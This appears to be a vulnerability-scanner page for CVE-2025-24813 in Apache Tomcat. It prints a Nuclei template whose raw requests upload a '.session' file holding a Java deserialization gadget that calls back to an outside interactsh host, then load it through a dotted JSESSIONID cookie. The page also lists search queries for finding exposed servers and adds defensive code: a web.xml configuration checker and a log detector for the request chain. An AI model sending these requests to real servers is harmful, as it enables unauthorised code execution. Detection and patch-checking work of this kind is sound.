
Apache Tomcat Path Equivalence - Remote Code Execution

ID: CVE-2025-24813

Severity: critical

Author: iamnoooob,rootxharsh,pdresearch,theMiddle

Tags: cve,cve2025,apache,tomcat,rce,intrusive

Path Equivalence: 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
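The description names the precondition for the write paths this CVE abuses: a Default Servlet that is write enabled, i.e. its `readonly` init-param set to `false` in Tomcat's `conf/web.xml` (Tomcat ships with it effectively `true`). The following is an added defender-side check, not part of the Nuclei template or of Tomcat; the two `web.xml` fragments are constructed samples, and the function name `default_servlet_writable` is this example's own.

```python
"""Added example: flag a Tomcat conf/web.xml whose DefaultServlet is write enabled.

Assumptions (not from the template): a web.xml in the javaee/jakartaee schema, and that
an absent `readonly` init-param means Tomcat's default of `true` (read-only) applies.
"""
import xml.etree.ElementTree as ET

DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"

# Constructed sample: stock-style web.xml with no readonly param (read-only by default).
STOCK_WEB_XML = """<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="4.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>listings</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""

# Constructed sample: an administrator has switched the Default Servlet to readonly=false.
WRITABLE_WEB_XML = STOCK_WEB_XML.replace(
    "<load-on-startup>",
    "<init-param>\n      <param-name>readonly</param-name>\n"
    "      <param-value>false</param-value>\n    </init-param>\n    <load-on-startup>",
)


def _local(tag):
    # Strip the namespace URI so the same check works for javaee and jakartaee schemas.
    return tag.rsplit("}", 1)[-1]


def _text(elem):
    return (elem.text or "").strip()


def default_servlet_writable(web_xml_text):
    """Return True if the DefaultServlet declares readonly=false, else False."""
    root = ET.fromstring(web_xml_text)
    for servlet in root.iter():
        if _local(servlet.tag) != "servlet":
            continue
        cls = next((_text(c) for c in servlet if _local(c.tag) == "servlet-class"), "")
        if cls != DEFAULT_SERVLET_CLASS:
            continue
        for param in servlet:
            if _local(param.tag) != "init-param":
                continue
            name = value = ""
            for child in param:
                if _local(child.tag) == "param-name":
                    name = _text(child)
                elif _local(child.tag) == "param-value":
                    value = _text(child)
            if name == "readonly":
                return value.lower() == "false"
        # DefaultServlet found but no readonly param: Tomcat's default is read-only.
        return False
    return False


if __name__ == "__main__":
    for label, doc in (("stock", STOCK_WEB_XML), ("modified", WRITABLE_WEB_XML)):
        state = "WRITE-ENABLED" if default_servlet_writable(doc) else "read-only"
        print(f"{label} web.xml: DefaultServlet is {state}")
```

Run it against a real `conf/web.xml` by reading the file into a string and passing it to `default_servlet_writable`; a `True` result means the PUT-based write path the template probes is reachable and the instance should be patched to the versions named in the remediation.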

```yaml
id: CVE-2025-24813

info:
  name: Apache Tomcat Path Equivalence - Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch,theMiddle
  severity: critical
  description: |
    Path Equivalence- 'file.Name' (Internal Dot) leading to Remote Code Execution and/or Information disclosure and/or malicious content added to uploaded files via write enabled Default Servlet in Apache Tomcat.
  remediation: |
    Users are recommended to upgrade to version 11.0.3, 10.1.35 or 9.0.98, which fixes the issue.
  reference:
    - https://scrapco.de/blog/analysis-of-cve-2025-24813-apache-tomcat-path-equivalence-rce.html
    - https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq
    - http://www.openwall.com/lists/oss-security/2025/03/10/5
    - https://nvd.nist.gov/vuln/detail/CVE-2025-24813
    - https://security.netapp.com/advisory/ntap-20250321-0001/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-24813
    cwe-id: CWE-44,CWE-502
    epss-score: 0.83157
    epss-percentile: 0.99253
    cpe: cpe:2.3:a:apache:tomcat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: apache
    product: tomcat
    shodan-query:
      - http.component:"apache tomcat"
      - cpe:"cpe:2.3:a:apache:tomcat"
      - http.html:"apache tomcat"
      - http.html:"jk status manager"
      - http.title:"apache tomcat"
      - product:"tomcat"
    fofa-query:
      - server=="apache tomcat"
      - body="apache tomcat"
      - body="jk status manager"
      - title="apache tomcat"
    google-query:
      - intitle:"apache tomcat"
      - site:*/examples/jsp/snp/snoop.jsp
  tags: cve,cve2025,apache,tomcat,rce,intrusive

variables:
  filename: "{{randbase(6)}}"

http:
  - raw:
      - |
        PUT /{{filename}}.session HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-452/457

        {{generate_java_gadget("dns", "http://{{interactsh-url}}", "raw")}}

      - |
        GET /{{filename}} HTTP/1.1
        Host: {{Hostname}}
        Cookie: JSESSIONID=.{{filename}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: status
        status:
          - 201
# digest: 4a0a00473045022100a185a2e442fa6f583946c204ef7d566cf394b090449ea56c2b45de0da68a03a002200841c3998f434bf45b3c633cb632c3aed82465bcbd8829583c7089cbee6fda60:922c64590222798bb761d5b6d8e72950
```

This is a Nuclei template for CVE-2025-24813. It sends the two raw requests above (a partial PUT of a `.session` file, then a GET whose `JSESSIONID` cookie points at that file) and reports the target as vulnerable only when both matchers fire: the PUT is answered with HTTP 201 and the interactsh server receives a DNS callback from the generated Java gadget.

```shell
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-24813.yaml"
```
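The two-stage probe above leaves a recognisable trace on the server side: a partial `PUT` (with a `Content-Range` header) to a path ending in `.session`, followed by a `GET` whose `JSESSIONID` cookie is the same file stem with a leading dot. The following is an added detection example that correlates those two stages over request records; it is not part of the Nuclei template. The record format (one dict per request with `method`, `path`, `headers`, `status`, as a reverse proxy or WAF might export) and the sample requests are constructed assumptions.

```python
"""Added example: detect the PUT-then-GET chain that this template sends.

Assumed input (not from the template): a list of request records, each a dict with
"method", "path", "headers" (a dict) and "status", e.g. exported from a reverse proxy.
"""
import re

SESSION_PUT_PATH = re.compile(r"^/(?P<stem>[^/]+)\.session$")
DOTTED_JSESSIONID = re.compile(r"JSESSIONID=\.(?P<stem>[^;\s]+)")

# Constructed sample traffic: a benign request, then the two stages of the probe.
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/index.jsp",
     "headers": {"Cookie": "JSESSIONID=1A2B3C4D"}, "status": 200},
    {"method": "PUT", "path": "/h7k2pq.session",
     "headers": {"Content-Range": "bytes 0-452/457"}, "status": 201},
    {"method": "GET", "path": "/h7k2pq",
     "headers": {"Cookie": "JSESSIONID=.h7k2pq"}, "status": 500},
]


def detect_session_upload_chain(records):
    """Return (index, finding, detail) tuples for suspicious requests.

    Findings:
      - "partial PUT of .session file": a Content-Range PUT to /<stem>.session
      - "session load of uploaded file": a GET whose JSESSIONID is .<stem> for a stem
        that an earlier PUT in this batch created (HTTP 201)
      - "leading-dot JSESSIONID": a dotted session id with no matching PUT seen
    """
    findings = []
    uploaded = {}  # stem -> index of the PUT that created /<stem>.session
    for i, rec in enumerate(records):
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        method = rec.get("method", "").upper()
        if method == "PUT":
            m = SESSION_PUT_PATH.match(rec.get("path", ""))
            if m and "content-range" in headers:
                findings.append((i, "partial PUT of .session file", rec["path"]))
                if rec.get("status") == 201:
                    uploaded[m.group("stem")] = i
        elif method == "GET":
            m = DOTTED_JSESSIONID.search(headers.get("cookie", ""))
            if m:
                stem = m.group("stem")
                if stem in uploaded:
                    findings.append((i, "session load of uploaded file", stem))
                else:
                    findings.append((i, "leading-dot JSESSIONID", stem))
    return findings


if __name__ == "__main__":
    for index, finding, detail in detect_session_upload_chain(SAMPLE_REQUESTS):
        print(f"request #{index}: {finding} ({detail})")
```

The correlation key is the file stem: the template uploads `/{{filename}}.session` and then presents `JSESSIONID=.{{filename}}`, so the stem of the PUT path reappearing as a dotted session id is the signal worth alerting on even when the PUT itself was not answered with 201. Tomcat's stock access log does not record cookies or `Content-Range`, so this check needs a log source that keeps request headers, or an `AccessLogValve` pattern extended to log them.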
